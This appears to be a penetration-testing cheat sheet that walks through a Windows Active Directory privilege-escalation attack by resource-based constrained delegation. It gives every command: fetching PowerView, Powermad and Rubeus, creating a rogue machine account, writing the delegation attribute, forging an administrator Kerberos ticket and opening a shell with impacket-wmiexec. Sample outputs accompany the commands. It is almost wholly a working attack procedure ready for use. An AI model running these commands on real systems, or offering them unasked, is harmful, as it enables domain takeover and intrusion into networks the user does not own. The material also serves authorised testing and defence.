Windows PrivEsc with Kerberos
Last modified: 2023-10-22
Privilege Escalation
First off, download two PS scripts in local machine..
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Then upload them to the target machine.
# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
1. Check User's Permission and Windows Versions
Check if users are allowed to create a new computer object on the domain.
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
# -------------------------
# Result
ms-ds-machineaccountquota: 10
And check if the machine is at least Windows Server 2012.
Get-DomainController
# -------------------------
# Result
OSVersion: Windows Server 2022 Standard
Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.
hostname
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity
# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME> {1, 0, 4, 128...}
2. Create a New Computer
Now you can create a new computer object.
New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01
# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103
Create a new raw security descriptor.
# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose
3. Impersonate to Get a Ticket
Download Rubeus.exe in local machine.
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Then upload it to the target machine and generate a RC4 hash.
# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com
# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4
We can request a Kerberos ticket for a new machine account while impersonating an administrator.
.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt
# --------------
# Result (copy the output long hash at the last)
Then generate a ticket (.kirbi
).
[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi
4. Make the Ticket Usable and Use It
Download “ticket_converter.py”.
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.
kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
We can use the ticket to get a shell.
impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k